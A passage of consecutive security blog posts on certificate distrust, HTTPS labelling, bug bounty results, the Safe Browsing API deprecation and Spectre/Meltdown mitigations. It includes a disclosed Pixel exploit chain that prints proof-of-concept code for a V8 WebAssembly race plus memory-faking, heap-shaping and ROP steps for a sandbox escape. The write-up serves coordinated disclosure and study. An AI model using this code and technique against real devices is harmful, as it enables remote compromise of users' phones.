above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.The DevTools message you will see if you need to replace your certificate before Chrome 70.If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.Expected Chrome Release TimelineThe table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.ReleaseFirst CanaryFirst BetaStable ReleaseChrome 66January 20, 2018~ March 15, 2018~ April 17, 2018Chrome 70~ July 20, 2018~ September 13, 2018~ October 16, 2018For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users.Special Mention: Chrome 65As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering in to special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.

Posted by Emily Schechter, Chrome Security Product ManagerFor the past several years, we’ve moved toward a more secure web by strongly advocating that sites adopt HTTPS encryption. And within the last year, we’ve also helped users understand that HTTP sites are not secure by gradually marking a larger subset of HTTP pages as “not secure”. Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as “not secure”.In Chrome 68, the omnibox will display “Not secure” for all HTTP pages.Developers have been transitioning their sites to HTTPS and making the web safer for everyone. Progress last year was incredible, and it’s continued since then:Over 68% of Chrome traffic on both Android and Windows is now protectedOver 78% of Chrome traffic on both Chrome OS and Mac is now protected81 of the top 100 sites on the web use HTTPS by defaultChrome is dedicated to making it as easy as possible to set up HTTPS. Mixed content audits are now available to help developers migrate their sites to HTTPS in the latest Node CLI version of Lighthouse, an automated tool for improving web pages. The new audit in Lighthouse helps developers find which resources a site loads using HTTP, and which of those are ready to be upgraded to HTTPS simply by changing the subresource reference to the HTTPS version.Lighthouse is an automated developer tool for improving web pages.Chrome’s new interface will help users understand that all HTTP sites are not secure, and continue to move the web towards a secure HTTPS web by default. HTTPS is easier and cheaper than ever before, and it unlocks both performance improvements and powerful new features that are too sensitive for HTTP. Developers, check out our set-up guides to get started.

Posted by Jan Keller, Google VRP Technical Pwning MasterAs we kick-off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We looking forward to continuing our collaboration with the community in 2018 and beyond!2017, By the NumbersHere’s an overview of how we rewarded researchers for their reports to us in 2017:We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android as well. Combined with our Chrome awards, we awarded nearly 3 million dollars to researchers for their reports last year, overall.Drilling-down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.A few bug highlightsEvery year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!Here are a few of our favorites from 2017:In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile pwn2own competition, and Guang’s report helped strengthen its protections even further.Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.Making Android and Play even saferOver the course of the year, we continued to develop our Android and Play Security Reward programs.No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.Today, we’re expanding the range of rewards for remote code executions from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.And finally, we want to give a shout out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even filing a bug.Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.

Posted by Alex Wozniak, Software Engineer, Safe Browsing TeamIn May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.

Posted by Mayank Jain and Scott Roberts, Android security team[Cross-posted from the Android Developers Blog]In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues. All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation. The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University. The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.Technical details of a Pixel remote exploit chainThe Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process. This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). The RCE bug (CVE-2017-5116)New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access. The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time. i::wasm::ModuleWireBytes GetFirstArgumentAsBytes( const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) { ...... } else if (source->IsTypedArray()) { //--->source should be checked if it's backed by a SharedArrayBuffer // A TypedArray was passed. Local<TypedArray> array = Local<TypedArray>::Cast(source); Local<ArrayBuffer> buffer = array->Buffer(); ArrayBuffer::Contents contents = buffer->GetContents(); start = reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset(); length = array->ByteLength(); } ...... return i::wasm::ModuleWireBytes(start, start + length);}A simple PoC is as follows: <html><h1>poc</h1><script id="worker1">worker:{ self.onmessage = function(arg) { console.log("worker started"); var ta = new Uint8Array(arg.data); var i =0; while(1){ if(i==0){ i=1; ta[51]=0; //--->4)modify the webassembly code at the same time }else{ i=0; ta[51]=128; } } }}</script><script>function getSharedTypedArray(){ var wasmarr = [ 0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65, 0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01, 0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b, 0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b]; var sb = new SharedArrayBuffer(wasmarr.length); //---> 1)put WebAssembly code in a SharedArrayBuffer var sta = new Uint8Array(sb); for(var i=0;i<sta.length;i++) sta[i]=wasmarr[i]; return sta; }var blob = new Blob([ document.querySelector('#worker1').textContent ], { type: "text/javascript" })var worker = new Worker(window.URL.createObjectURL(blob)); //---> 2)create a web workervar sta = getSharedTypedArray();worker.postMessage(sta.buffer); //--->3)pass the WebAssembly code to the web workersetTimeout(function(){ while(1){ try{ sta[51]=0; var myModule = new WebAssembly.Module(sta); //--->4)parse the WebAssembly code var myInstance = new WebAssembly.Instance(myModule); //myInstance.exports.getAnswerPlus1(); }catch(e){ } } },1000);//worker.terminate(); </script></html>The text format of the WebAssembly code is as follows: 00002b func[0]:00002d: 41 2a | i32.const 4200002f: 0b | end000030 func[1]:000032: 10 00 | call 0000034: 41 01 | i32.const 1000036: 6a | i32.add000037: 0b | endFirst, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs. Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked. (func $leak(param i32 i32 i32 i32 i32 i32)(result i32) i32.const 0 get_local 0 i32.store i32.const 4 get_local 1 i32.store i32.const 8 get_local 2 i32.store i32.const 12 get_local 3 i32.store i32.const 16 get_local 4 i32.store i32.const 20 get_local 5 i32.store i32.const 0 ))Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript: /*Text format of funcx*/ (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32) get_local 5 get_local 4 i32.add)/*Disassembly code of funcx*/--- Code ---kind = WASM_FUNCTIONname = wasm#1compiler = turbofanInstructions (size = 20)0x58f87600 0 8b442404 mov eax,[esp+0x4]0x58f87604 4 03c6 add eax,esi0x58f87606 6 c20400 ret 0x40x58f87609 9 0f1f00 nopSafepoints (size = 8)RelocInfo (size = 0)--- End code ---When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function. /*Disassembly code of JS_TO_WASM function */--- Code ---kind = JS_TO_WASM_FUNCTIONname = js-to-wasm#0compiler = turbofanInstructions (size = 170)0x4be08f20 0 55 push ebp0x4be08f21 1 89e5 mov ebp,esp0x4be08f23 3 56 push esi0x4be08f24 4 57 push edi0x4be08f25 5 83ec08 sub esp,0x80x4be08f28 8 8b4508 mov eax,[ebp+0x8]0x4be08f2b b e8702e2bde call 0x2a0bbda0 (ToNumber) ;; code: BUILTIN0x4be08f30 10 a801 test al,0x10x4be08f32 12 0f852a000000 jnz 0x4be08f62 <+0x42>The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows: /* ArrayBuffer layouts 40 Bytes*/ Map Properties Elements ByteLength BackingStore AllocationBase AllocationLength Fields internal internal /* Map layouts 44 Bytes*/ static kMapOffset = 0, static kInstanceSizesOffset = 4, static kInstanceAttributesOffset = 8, static kBitField3Offset = 12, static kPrototypeOffset = 16, static kConstructorOrBackPointerOffset = 20, static kTransitionsOrPrototypeInfoOffset = 24, static kDescriptorsOffset = 28, static kLayoutDescriptorOffset = 1, static kCodeCacheOffset = 32, static kDependentCodeOffset = 36, static kWeakCellCacheOffset = 40, static kPointerFieldsBeginOffset = 16, static kPointerFieldsEndOffset = 44, static kInstanceSizeOffset = 4, static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5, static kUnusedOffset = 6, static kVisitorIdOffset = 7, static kInstanceTypeOffset = 8, //one byte static kBitFieldOffset = 9, static kInstanceTypeAndBitFieldOffset = 8, static kBitField2Offset = 10, static kUnusedPropertyFieldsOffset = 11Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode. Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit. The EoP Bug (CVE-2017-14904)The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap: static int gralloc_map(gralloc_module_t const* module, buffer_handle_t handle){ …… private_handle_t* hnd = (private_handle_t*)handle; …… if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) && !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) { size = hnd->size; err = memalloc->map_buffer(&mappedAddress, size, hnd->offset, hnd->fd); //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process. if(err || mappedAddress == MAP_FAILED) { ALOGE("Could not mmap handle %p, fd=%d (%s)", handle, hnd->fd, strerror(errno)); return -errno; } hnd->base = uint64_t(mappedAddress) + hnd->offset; //---> save mappedAddress+offset to hnd->base } else { err = -EACCES;}…… return err;}gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process. static int gralloc_unmap(gralloc_module_t const* module, buffer_handle_t handle){ …… if(hnd->base) { err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset); //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched. if (err) { ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base, strerror(errno)); return -errno; } hnd->base = 0;}…… return 0;}int IonAlloc::unmap_buffer(void *base, unsigned int size, unsigned int /*offset*/) //---> look, offset is not used by unmap_buffer{ int err = 0; if(munmap(base, size)) { err = -errno; ALOGE("ion: Failed to unmap memory at %p : %s", base, strerror(errno)); } return err;}Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services. 52neverallow isolated_app {53 service_manager_type54 -activity_service55 -display_service56 -webviewupdate_service57}:service_manager find;To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered. This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app. To exploit this EoP bug: 1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping: 7f54600000-7f54800000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f58000000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)......2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]//--->There is a 2MB memory gap7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)3. Fill the unmapped space with an ashmem memory: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f547ff000-7f549ff000 rw-s 00000000 00:04 31605 /dev/ashmem/360alpha1001 (deleted) //--->The gap is filled with the ashmem memory 360alpha10017f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)4. Spray the heap and the heap data will be written to the ashmem memory: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f547ff000-7f549ff000 rw-s 00000000 00:04 31605 /dev/ashmem/360alpha1001 (deleted)//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP. typedef struct android_native_base_t{ /* a magic value defined by the actual EGL native type */ int magic; /* the sizeof() of the actual EGL native type */ int version; void* reserved[4]; /* reference-counting interface */ void (*incRef)(struct android_native_base_t* base); void (*decRef)(struct android_native_base_t* base);} android_native_base_t;6.Trigger a GC to execute ROP When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf . SummaryThe Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities. The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort. .com { color: #32CD32; font-weight: bold; }

Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program ManagerYesterday, Google’s Project Zero team posted detailed technical information on three variants of a new security issue involving speculative execution on many modern CPUs. Today, we’d like to share some more information about our mitigations and performance.In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” -- a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.In addition, we have deployed Kernel Page Table Isolation (KPTI) -- a general purpose technique for better protecting sensitive information in memory from other software running on a machine -- to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.There has been speculation that the deployment of KPTI causes significant performance slowdowns. Performance can vary, as the impact of the KPTI mitigations depends on the rate of system calls made by an application. On most of our workloads, including our cloud infrastructure, we see negligible impact on performance.In our own testing, we have found that microbenchmarks can show an exaggerated impact. Of course, Google recommends thorough testing in your environment before deployment; we cannot guarantee any particular performance or operational impact.Speculative Execution and the Three Methods of AttackIn addition, to follow up on yesterday’s post, today we’re providing a summary of speculative execution and how each of the three variants work.In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.Project Zero discussed three variants of speculative execution attack. There is no single fix for all three attack variants; each requires protection independently.Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific sequences within compiled applications, which must be addressed on a per-binary basis.Variant 2 (CVE-2017-5715), “branch target injection”. This variant may either be fixed by a CPU microcode update from the CPU vendor, or by applying a software mitigation technique called “Retpoline” to binaries where concern about information leakage is present. This mitigation may be applied to the operating system kernel, system programs and libraries, and individual software programs, as needed.Variant 3 (CVE-2017-5754), “rogue data cache load.” This may require patching the system’s operating system. For Linux there is a patchset called KPTI (Kernel Page Table Isolation) that helps mitigate Variant 3. Other operating systems may implement similar protections - check with your vendor for specifics.SummaryMitigationVariant 1: bounds check bypass (CVE-2017-5753)This attack variant allows malicious code to circumvent bounds checking features built into most binaries. Even though the bounds checks will still fail, the CPU will speculatively execute instructions after the bounds checks, which can access memory that the code could not normally access. When the CPU determines the bounds check has failed, it discards any work that was done speculatively; however, some changes to the system can be still observed (in particular, changes to the state of the CPU caches). The malicious code can detect these changes and read the data that was speculatively accessed.The primary ramification of Variant 1 is that it is difficult for a system to run untrusted code within a process and restrict what memory within the process the untrusted code can access.In the kernel, this has implications for systems such as the extended Berkeley Packet Filter (eBPF) that takes packet filterers from user space code, just-in-time (JIT) compiles the packet filter code, and runs the packet filter within the context of kernel. The JIT compiler uses bounds checking to limit the memory the packet filter can access, however, Variant 1 allows an attacker to use speculation to circumvent these limitations.Mitigation requires analysis and recompilation so that vulnerable binary code is not emitted. Examples of targets which may require patching include the operating system and applications which execute untrusted code.Variant 2: branch target injection (CVE-2017-5715)This attack variant uses the ability of one process to influence the speculative execution behavior of code in another security context (i.e., guest/host mode, CPU ring, or process) running on the same physical CPU core.Modern processors predict the destination for indirect jumps and calls that a program may take and start speculatively executing code at the predicted location. The tables used to drive prediction are shared between processes running on a physical CPU core, and it is possible for one process to pollute the branch prediction tables to influence the branch prediction of another process or kernel code.In this way, an attacker can cause speculative execution of any mapped code in another process, in the hypervisor, or in the kernel, and potentially read data from the other protection domain using techniques like Variant 1. This variant is difficult to use, but has great potential power as it crosses arbitrary protection domains.Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), or applying a software mitigation (e.g., Google's Retpoline) to the hypervisor, operating system kernel, system programs and libraries, and user applications.Variant 3: rogue data cache load (CVE-2017-5754)This attack variant allows a user mode process to access virtual memory as if the process was in kernel mode. On some processors, the speculative execution of code can access memory that is not typically visible to the current execution mode of the processor; i.e., a user mode program may speculatively access memory as if it were running in kernel mode.Using the techniques of Variant 1, a process can observe the memory that was accessed speculatively. On most operating systems today, the page table that a process uses includes access to most physical memory on the system, however access to such memory is limited to when the process is running in kernel mode. Variant 3 enables access to such memory even in user mode, violating the protections of the hardware.Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.Mitigations for Google productsYou can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.

Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program Manager[Google Cloud, G Suite, and Chrome customers can visit the Google Cloud blog for details about those products][For more technical details about this issue, please read Project Zero's blog post]Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host.These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them.As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack. We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web. These efforts have included collaborative analysis and the development of novel mitigations.We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming (update: this has been published; see above).Mitigation status for Google productsA list of affected Google products and their current status of mitigation against this attack appears here. As this is a new class of attack, our patch status refers to our mitigation for currently known vectors for exploiting the flaw. The issue has been mitigated in many products (or wasn’t a vulnerability in the first place). In some instances, users and customers may need to take additional steps to ensure they’re using a protected version of a product. This list and a product’s status may change as new developments warrant. In the case of new developments, we will post updates to this blog.All Google products not explicitly listed below require no user or customer action.AndroidDevices with the latest security update are protected. Furthermore, we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices.Supported Nexus and Pixel devices with the latest security update are protected.Further information is available here.Google Apps / G Suite (Gmail, Calendar, Drive, Sites, etc.):No additional user or customer action needed.Google ChromeSome user or customer action needed. More information here.Google Chrome OS (e.g., Chromebooks):Some additional user or customer action needed. More information here.Google Cloud PlatformGoogle App Engine: No additional customer action needed.Google Compute Engine: Some additional customer action needed. More information here.Google Kubernetes Engine: Some additional customer action needed. More information here.Google Cloud Dataflow: Some additional customer action needed. More information here.Google Cloud Dataproc: Some additional customer action needed. More information here. All other Google Cloud products and services: No additional action needed.Google Home / Chromecast:No additional user action needed.Google Wifi/OnHub:No additional user action needed.Multiple methods of attackTo take advantage of this vulnerability, an attacker first must be able to run malicious code on the targeted system.The Project Zero researchers discovered three methods (variants) of attack, which are effective under different conditions. All three attack variants can allow a process with normal user privileges to perform unauthorized reads of memory data, which may contain sensitive 